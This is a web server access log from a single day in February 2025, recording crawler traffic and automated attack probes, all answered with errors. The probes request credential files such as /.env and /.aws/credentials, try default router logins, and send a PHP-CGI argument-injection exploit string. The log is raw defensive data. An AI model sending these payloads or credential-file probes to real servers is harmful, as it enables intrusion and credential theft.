156.59.198.135 - - [09/Feb/2025:01:04:46 +0100] "GET /docs/contadino/2017/RE17-000021.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:01:11:45 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005141503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:01:19:21 +0100] "GET /renault.2web.at/stats/lang/awstats-al.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:01:23:21 +0100] "GET /docs/contadino/2017/RE17-000024.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.87.57.59 - - [09/Feb/2025:01:25:39 +0100] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 378 "-" "-"
156.59.198.135 - - [09/Feb/2025:01:27:22 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/vblank.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:01:56:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111041503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.205.213.198 - - [09/Feb/2025:02:05:13 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
15.236.212.79 - - [09/Feb/2025:02:07:50 +0100] "GET /github.php HTTP/1.1" 404 298 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
15.236.212.79 - - [09/Feb/2025:02:08:00 +0100] "GET /.well-known/github.php HTTP/1.1" 404 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
15.236.212.79 - - [09/Feb/2025:02:08:05 +0100] "GET /assets/github.php HTTP/1.1" 404 302 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
15.236.212.79 - - [09/Feb/2025:02:08:11 +0100] "GET /.well-known/acme-challenge/github.php HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
15.236.212.79 - - [09/Feb/2025:02:08:22 +0100] "GET /.well-known/pki-validation/github.php HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
15.236.212.79 - - [09/Feb/2025:02:08:39 +0100] "GET /assets/css/github.php HTTP/1.1" 404 304 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
94.181.187.69 - - [09/Feb/2025:02:09:58 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.135 - - [09/Feb/2025:02:11:20 +0100] "GET /ed.activities.at/stats/lang/awstats-gr.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:02:15:20 +0100] "GET /ed.activities.at/stats/lang/awstats-ru.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:02:19:21 +0100] "GET /docs/contadino/2017/RE17-000015.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:02:32:36 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image091.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
216.24.219.186 - - [09/Feb/2025:02:42:13 +0100] "GET /.aws/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
216.24.219.47 - - [09/Feb/2025:02:42:15 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15"
216.24.219.59 - - [09/Feb/2025:02:42:15 +0100] "GET /admin/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
216.24.219.23 - - [09/Feb/2025:02:42:15 +0100] "GET /.aws/credentials HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
185.196.220.253 - - [09/Feb/2025:03:00:18 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.136 - - [09/Feb/2025:03:01:49 +0100] "GET /ed.activities.at/stats/lang/awstats-sr.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
147.185.132.52 - - [09/Feb/2025:03:03:04 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 369 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [09/Feb/2025:03:05:49 +0100] "GET /docs/contadino/2017/RE17-000027.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:03:09:49 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00003.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:03:13:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109211503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.0.235 - - [09/Feb/2025:03:16:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)"
156.59.198.136 - - [09/Feb/2025:03:17:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201512091443_RenOrderAction.xml HTTP/1.0" 404 333 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
161.35.214.108 - - [09/Feb/2025:03:26:25 +0100] "GET / HTTP/1.1" 400 504 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
87.120.113.33 - - [09/Feb/2025:03:30:50 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
156.59.198.135 - - [09/Feb/2025:03:40:12 +0100] "GET /renault.2web.at/stats/lang/awstats-tw.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.116 - - [09/Feb/2025:03:43:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
156.59.198.136 - - [09/Feb/2025:03:44:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103231303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:03:48:12 +0100] "GET /ed.activities.at/stats/lang/awstats-ko.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [09/Feb/2025:03:49:44 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.132 - - [09/Feb/2025:03:50:58 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [09/Feb/2025:03:55:45 +0100] "GET /docs/contadino/2017/RE17-000025.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.13.224.222 - - [09/Feb/2025:03:58:47 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)"
31.13.224.222 - - [09/Feb/2025:03:59:51 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3887.0 Safari/537.36"
156.59.198.135 - - [09/Feb/2025:04:10:44 +0100] "GET /ed.activities.at/stats/lang/awstats-fi.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
209.38.209.90 - - [09/Feb/2025:04:23:32 +0100] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 287 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/2371-01-07 06:50:14.469713 Firefox/3.6.10"
45.148.10.238 - - [09/Feb/2025:04:23:36 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
185.93.89.118 - - [09/Feb/2025:04:24:41 +0100] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
156.59.198.136 - - [09/Feb/2025:04:30:46 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104221003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:04:40:10 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006241503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:04:44:10 +0100] "GET /renault.2web.at/stats/lang/awstats-fr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:04:48:10 +0100] "GET /docs/ecommlogistics/belege/RE2017.PDF HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:04:52:10 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/pal_bk.png HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:05:09:38 +0100] "GET /ed.activities.at/stats/lang/awstats-he.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:05:13:37 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001071403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
209.38.200.81 - - [09/Feb/2025:05:32:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
209.38.200.81 - - [09/Feb/2025:05:32:00 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (compatible)"
156.59.198.135 - - [09/Feb/2025:05:49:41 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911251403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [09/Feb/2025:05:51:48 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
4.151.230.245 - - [09/Feb/2025:05:52:56 +0100] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
176.65.137.206 - - [09/Feb/2025:05:53:09 +0100] "GET /api.json HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Linux x86_64)"
176.65.137.206 - - [09/Feb/2025:05:53:14 +0100] "GET /api.json HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Linux x86_64)"
156.59.198.136 - - [09/Feb/2025:05:53:42 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image063.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:05:57:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102021503_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:06:01:42 +0100] "GET /renault.2web.at/stats/lang/awstats-si.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.177 - - [09/Feb/2025:06:04:03 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.177 - - [09/Feb/2025:06:04:03 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.6.30 Version/10.63"
78.153.140.177 - - [09/Feb/2025:06:04:03 +0100] "GET /.ENV HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; CrOS x86_64 9592.96.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.114 Safari/537.36"
78.153.140.177 - - [09/Feb/2025:06:04:03 +0100] "GET /.Env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0"
78.153.140.177 - - [09/Feb/2025:06:04:03 +0100] "GET /.AWS/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36"
78.153.140.177 - - [09/Feb/2025:06:04:03 +0100] "GET /.AWS/CREDENTIALS HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2393.94"
78.153.140.177 - - [09/Feb/2025:06:04:03 +0100] "GET /.Aws/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
78.153.140.177 - - [09/Feb/2025:06:04:04 +0100] "GET /.CONFIG.yaml HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36 OPR/38.0.2213.0 (Edition developer)"
78.153.140.177 - - [09/Feb/2025:06:04:05 +0100] "GET /.Config.yaml HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62"
78.153.140.177 - - [09/Feb/2025:06:04:08 +0100] "GET /.env.BAK HTTP/1.1" 404 353 "-" "Opera 9.4 (Windows NT 5.3; U; en)"
78.153.140.177 - - [09/Feb/2025:06:04:12 +0100] "GET /.ENV.example HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
78.153.140.177 - - [09/Feb/2025:06:04:12 +0100] "GET /.env.EXAMPLE HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; LG-V410/V41010d Build/KOT49I.V41010d) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.1599.103 Safari/537.36"
78.153.140.177 - - [09/Feb/2025:06:04:13 +0100] "GET /.ENV.EXAMPLE HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41"
78.153.140.177 - - [09/Feb/2025:06:04:13 +0100] "GET /ADMIN/.env HTTP/1.1" 404 355 "-" "Opera/9.80 (X11; Linux zvav; U; sv) Presto/2.8.119 Version/11.10"
78.153.140.177 - - [09/Feb/2025:06:04:13 +0100] "GET /Admin/.env HTTP/1.1" 404 355 "-" "Opera/9.20 (Windows NT 6.0; U; es-es)"
78.153.140.177 - - [09/Feb/2025:06:04:14 +0100] "GET /Application/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10"
78.153.140.177 - - [09/Feb/2025:06:04:14 +0100] "GET /APPLICATION/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0"
78.153.140.177 - - [09/Feb/2025:06:04:16 +0100] "GET /BACKEND/.env HTTP/1.1" 404 357 "-" "SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
78.153.140.177 - - [09/Feb/2025:06:04:17 +0100] "GET /Config/.env HTTP/1.1" 404 356 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; .NET4.0E; MS-RTC LM 8)"
78.153.140.177 - - [09/Feb/2025:06:04:19 +0100] "GET /CONFIG/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (iPod; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1"
78.153.140.177 - - [09/Feb/2025:06:04:19 +0100] "GET /Core/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8) Gecko/20060321 Firefox/2.0a1"
78.153.140.177 - - [09/Feb/2025:06:04:19 +0100] "GET /CORE/.env HTTP/1.1" 404 354 "-" "Opera/9.61 (Windows NT 5.1; U; cs) Presto/2.1.1"
78.153.140.177 - - [09/Feb/2025:06:04:20 +0100] "GET /Cp/.env HTTP/1.1" 404 352 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; BRI/1; .NET4.0C; BRI/2; AskTbX-SD/5.14.1.20007; .NET4.0E)"
78.153.140.177 - - [09/Feb/2025:06:04:20 +0100] "GET /CP/.env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36"
78.153.140.177 - - [09/Feb/2025:06:04:20 +0100] "GET /Credentials HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G935V Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36"
78.153.140.177 - - [09/Feb/2025:06:04:21 +0100] "GET /CREDENTIALS HTTP/1.1" 404 356 "-" "Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01"
78.153.140.177 - - [09/Feb/2025:06:04:21 +0100] "GET /Crm/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B5130b Safari/601.1"
78.153.140.177 - - [09/Feb/2025:06:04:21 +0100] "GET /CRM/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0"
78.153.140.177 - - [09/Feb/2025:06:04:21 +0100] "GET /Data/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; Android 5.1.1; LGMS330 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36"
78.153.140.177 - - [09/Feb/2025:06:04:21 +0100] "GET /DATA/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
156.59.198.136 - - [09/Feb/2025:06:05:43 +0100] "GET /ed.activities.at/stats/lang/awstats-br.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:06:09:43 +0100] "GET /docs/contadino/2017/RE17-000032.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:06:13:42 +0100] "GET /ed.activities.at/stats/lang/awstats-tw.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.0.235 - - [09/Feb/2025:06:13:57 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.93.89.118 - - [09/Feb/2025:06:16:18 +0100] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
78.153.140.203 - - [09/Feb/2025:06:33:23 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1"
78.153.140.203 - - [09/Feb/2025:06:33:23 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.203 - - [09/Feb/2025:06:33:24 +0100] "GET /Demo/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1) Gecko/20061211 Firefox/2.0"
78.153.140.203 - - [09/Feb/2025:06:33:24 +0100] "GET /DEMO/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) WebClip/13604.3.5 Safari/13604.3.5"
78.153.140.203 - - [09/Feb/2025:06:33:24 +0100] "GET /Dev/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:40.0) Gecko/20100101 Firefox/40.0"
78.153.140.203 - - [09/Feb/2025:06:33:24 +0100] "GET /DEV/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1"
78.153.140.203 - - [09/Feb/2025:06:33:24 +0100] "GET /Doc/.env HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4)"
78.153.140.203 - - [09/Feb/2025:06:33:24 +0100] "GET /DOC/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.203 - - [09/Feb/2025:06:33:24 +0100] "GET /Docs/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; Android 4.2.2; en-us; SAMSUNG SCH-I545 Build/JDQ39) AppleWebKit/535.19 (KHTML, like Gecko) Version/1.0 Chrome/18.0.1025.308 Mobile Safari/535.19"
78.153.140.203 - - [09/Feb/2025:06:33:25 +0100] "GET /DOCS/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 5.2; U; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70"
